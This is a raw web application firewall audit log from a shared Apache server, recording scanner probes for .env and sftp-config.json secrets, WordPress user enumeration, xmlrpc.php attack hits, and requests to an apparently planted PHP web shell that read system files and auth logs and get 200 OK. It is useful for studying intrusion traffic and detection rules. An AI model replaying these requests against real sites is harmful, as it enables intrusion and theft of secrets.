proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982404350329 1227720 (- - -) Stopwatch2: 1749982404350329 1227720; combined=1582, p1=352, p2=1136, p3=0, p4=0, p5=94, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --942e4972-Z-- --9d5a2224-A-- [15/Jun/2025:15:43:26.170715 +0530] aE6cxRRnvL96XFagPFCv6gAAAAY 83.217.210.41 50454 127.0.0.1 7081 --9d5a2224-B-- GET //dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --9d5a2224-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/dev/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --9d5a2224-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/dev/.env"] [unique_id "aE6cxRRnvL96XFagPFCv6gAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982405543782 627035 (- - -) Stopwatch2: 1749982405543782 627035; combined=1626, p1=362, p2=1150, p3=0, p4=0, p5=113, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d5a2224-Z-- --d86f7423-A-- [15/Jun/2025:15:43:27.870483 +0530] aE6cxjS8xKUOR1xBR5bgfgAAAAM 83.217.210.41 50502 127.0.0.1 7081 --d86f7423-B-- GET /dev/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//dev/.env accept-encoding: gzip --d86f7423-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --d86f7423-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/dev/.env"] [unique_id "aE6cxjS8xKUOR1xBR5bgfgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982406554043 1316505 (- - -) Stopwatch2: 1749982406554043 1316505; combined=2090, p1=355, p2=1638, p3=0, p4=0, p5=96, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d86f7423-Z-- --49989d30-A-- [15/Jun/2025:15:43:28.360309 +0530] aE6cxxRnvL96XFagPFCv6wAAAAY 83.217.210.41 50540 127.0.0.1 7081 --49989d30-B-- GET //production/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) accept-encoding: gzip --49989d30-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://arch.cstechns.com/production/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --49989d30-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/production/.env"] [unique_id "aE6cxxRnvL96XFagPFCv6wAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982407766458 593939 (- - -) Stopwatch2: 1749982407766458 593939; combined=1803, p1=385, p2=1307, p3=0, p4=0, p5=111, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --49989d30-Z-- --dc1e7a23-A-- [15/Jun/2025:15:43:30.040660 +0530] aE6cyMZRGs9Zs5Qd_koWDwAAAAA 83.217.210.41 50584 127.0.0.1 7081 --dc1e7a23-B-- GET /production/.env HTTP/1.0 Host: arch.cstechns.com X-Real-IP: 83.217.210.41 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (compatible; LeakScanner/1.0) referer: https://arch.cstechns.com//production/.env accept-encoding: gzip --dc1e7a23-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://arch.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --dc1e7a23-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "arch.cstechns.com"] [uri "/production/.env"] [unique_id "aE6cyMZRGs9Zs5Qd_koWDwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/arch.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982408750086 1290636 (- - -) Stopwatch2: 1749982408750086 1290636; combined=1656, p1=375, p2=1198, p3=0, p4=0, p5=82, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc1e7a23-Z-- --f7809e60-A-- [15/Jun/2025:15:44:55.708876 +0530] aE6dH8ZRGs9Zs5Qd_koWNwAAAAA 34.236.41.241 56236 127.0.0.1 7081 --f7809e60-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/plymouth HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.236.41.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f7809e60-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3627 Connection: close Content-Type: text/html; charset=UTF-8 --f7809e60-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/plymouth"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6dH8ZRGs9Zs5Qd_koWNwAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/plymouth"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6dH8ZRGs9Zs5Qd_koWNwAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749982495705010 3917 (- - -) Stopwatch2: 1749982495705010 3917; combined=2045, p1=355, p2=1541, p3=33, p4=33, p5=83, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f7809e60-Z-- --cf930e43-A-- [15/Jun/2025:15:45:19.632727 +0530] aE6dNzS8xKUOR1xBR5bgsgAAAAM 54.225.148.123 42744 127.0.0.1 7081 --cf930e43-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/profile.d&viewfile=//etc/profile.d/Z97-byobu.sh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.225.148.123 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --cf930e43-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3689 Connection: close Content-Type: text/html; charset=UTF-8 --cf930e43-H-- Message: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/z97-byobu.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:path: /etc/profile.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6dNzS8xKUOR1xBR5bgsgAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/profile found within ARGS:viewfile: /etc/profile.d/z97-byobu.sh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6dNzS8xKUOR1xBR5bgsgAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749982519629178 3602 (- - -) Stopwatch2: 1749982519629178 3602; combined=1918, p1=278, p2=1483, p3=37, p4=35, p5=85, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf930e43-Z-- --a75fb44f-A-- [15/Jun/2025:15:52:56.764322 +0530] aE6e_zQchg8T7fp9tjNvBQAAAAI 66.249.72.129 57840 127.0.0.1 7081 --a75fb44f-B-- POST /?ob=open-bridge/events HTTP/1.0 Host: www.retaxis.com X-Real-IP: 66.249.72.129 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 403 Accept-Language: en-US Content-Type: text/plain;charset=UTF-8 Cookie: _fbp=fb.1.1749945600032.17991876015955610 Origin: https://www.retaxis.com Referer: https://www.retaxis.com/best-b2b-multivendor-marketplace-platform/ Accept: */* From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --a75fb44f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.28 Vary: Origin,Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: https://www.retaxis.com Access-Control-Allow-Credentials: true Access-Control-Max-Age: 86400 Set-Cookie: _sfs_id=179e845b4597706c815c84c8c2730b561749982976; expires=Sun, 15 Jun 2025 11:22:56 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=j1il5adhh0095gf1efp1hk29lk; expires=Sat, 13 Sep 2025 10:22:56 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --a75fb44f-E-- --a75fb44f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE6e_zQchg8T7fp9tjNvBQAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE6e_zQchg8T7fp9tjNvBQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749982975501813 1262652 (- - -) Stopwatch2: 1749982975501813 1262652; combined=2795, p1=442, p2=2082, p3=111, p4=37, p5=123, sr=90, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a75fb44f-Z-- --1a004724-A-- [15/Jun/2025:15:56:26.420938 +0530] aE6f0lirsA1ruSKrNWSNlgAAAAQ 15.188.59.76 48562 127.0.0.1 7080 --1a004724-B-- GET /sftp-config.json HTTP/1.0 Host: printotech.cstechns.com X-Real-IP: 15.188.59.76 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --1a004724-F-- HTTP/1.1 404 Not Found Content-Length: 269 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a004724-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "printotech.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE6f0lirsA1ruSKrNWSNlgAAAAQ"] Stopwatch: 1749983186417608 3386 (- - -) Stopwatch2: 1749983186417608 3386; combined=2074, p1=396, p2=1584, p3=20, p4=25, p5=49, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1a004724-Z-- --d8dc9b32-A-- [15/Jun/2025:16:03:33.433642 +0530] aE6hfRRnvL96XFagPFCx9AAAAAY 196.251.85.177 46204 127.0.0.1 7081 --d8dc9b32-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --d8dc9b32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex Link: <https://www.rsda.in/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --d8dc9b32-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rsda.in"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6hfRRnvL96XFagPFCx9AAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983613072689 361043 (- - -) Stopwatch2: 1749983613072689 361043; combined=2562, p1=449, p2=1997, p3=0, p4=0, p5=115, sr=113, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d8dc9b32-Z-- --47179b3a-A-- [15/Jun/2025:16:03:37.302846 +0530] aE6hgK2euZ1FxcuRqPppqAAAAAo 196.251.85.177 46438 127.0.0.1 7081 --47179b3a-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 491 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --47179b3a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --47179b3a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6hgK2euZ1FxcuRqPppqAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983616948169 354735 (- - -) Stopwatch2: 1749983616948169 354735; combined=132630, p1=381, p2=1397, p3=61, p4=63, p5=65407, sr=122, sw=65321, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47179b3a-Z-- --5e7cdf1a-A-- [15/Jun/2025:16:04:36.478001 +0530] aE6hvDS8xKUOR1xBR5birQAAAAM 196.251.85.177 46388 127.0.0.1 7081 --5e7cdf1a-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --5e7cdf1a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5e7cdf1a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (110+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (110+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6hvDS8xKUOR1xBR5birQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983676196448 281609 (- - -) Stopwatch2: 1749983676196448 281609; combined=2034, p1=371, p2=1311, p3=49, p4=49, p5=158, sr=105, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5e7cdf1a-Z-- --743cf754-A-- [15/Jun/2025:16:05:36.574730 +0530] aE6h-Gah4jZQMChzmsZ6ngAAAAI 196.251.85.177 35574 127.0.0.1 7081 --743cf754-B-- POST //xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml --743cf754-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --743cf754-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (112+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 196.251.85.177 (112+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE6h-Gah4jZQMChzmsZ6ngAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749983736287431 287360 (- - -) Stopwatch2: 1749983736287431 287360; combined=2282, p1=455, p2=1409, p3=61, p4=58, p5=183, sr=87, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --743cf754-Z-- --5aa4de62-A-- [15/Jun/2025:16:06:36.161521 +0530] aE6iNDr2XEdSo0rTaLVpCQAAAAg 44.205.74.196 60608 127.0.0.1 7081 --5aa4de62-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/auth.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.205.74.196 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: 